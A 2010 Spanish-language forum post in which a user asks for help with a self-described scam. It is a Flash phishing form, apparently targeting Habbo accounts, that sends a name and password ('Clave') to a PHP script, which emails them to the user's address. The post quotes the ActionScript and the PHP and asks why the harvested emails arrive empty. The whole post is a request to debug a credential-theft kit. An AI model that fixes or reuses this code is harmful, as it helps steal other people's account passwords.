Ver Mensaje Individual
  #1 (permalink)  
Antiguo 25/04/2010, 12:28
jorgec72c
 
Fecha de Ingreso: abril-2010
Mensajes: 3
Antigüedad: 14 años
Puntos: 0
Ayuda con Scam(fake) en Flash

Que codigo debo poner en el archivo PHP para que me lleguen los datos.
Esto es el codigo del Flash
Cita:
// Action script...

// [Action in Frame 171]
function enviar()
{
* *trace (t_nombre.text);
* *datos_email.nombre = t_nombre.text;
* *datos_email.email = t_email.text;
* *datos_email.texto = t_texto.htmlText;
* *datos_email.estado = "";
* *datos_email.onLoad = function ()
* *{
* * * *trace (this);
* * * *trace (this.estado);
* * * *if (this.estado == "enviado")
* * * *{
* * * * * *gotoAndStop(222);
* * * *}
* * * *else
* * * *{
* * * * * *gotoAndStop(223);
* * * *} // end else if
* *};
* *datos_email.sendAndLoad("enviar_email.php", datos_email, "post");
* *gotoAndStop(221);
} // End of the function

System.useCodepage = false;
if (datos_email == null)
{
* *datos_email = new LoadVars();
* *datos_email.nombre = "";
* *datos_email.email = "";
* *datos_email.texto = "";
* *datos_email.estado = "";
} // end if
t_nombre.text = datos_email.nombre;
t_email.text = datos_email.email;
t_texto.htmlText = datos_email.texto;
this.b_enviar.onPress = enviar;
stop ();

stop ();

// [Action in Frame 220]
stop ();

// [Action in Frame 222]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();

// [Action in Frame 223]
this.b_enviar.onPress = function ()
{
* *gotoAndStop(1);
};
stop ();
Yo intente con un PHP con este codigo:

Cita:
<?
$content .= "
Nombre: " . $_POST['Nombre'] . " ";

$content .= "
Clave: " . $_POST['Clave'] . " ";

mail("MIEMAIL","Habbo",$content);

include ("reload.php");
?>
Me llegaba un email pero estaba en blanco. (ponia Nombre: Clave: )

Última edición por jorgec72c; 25/04/2010 a las 12:54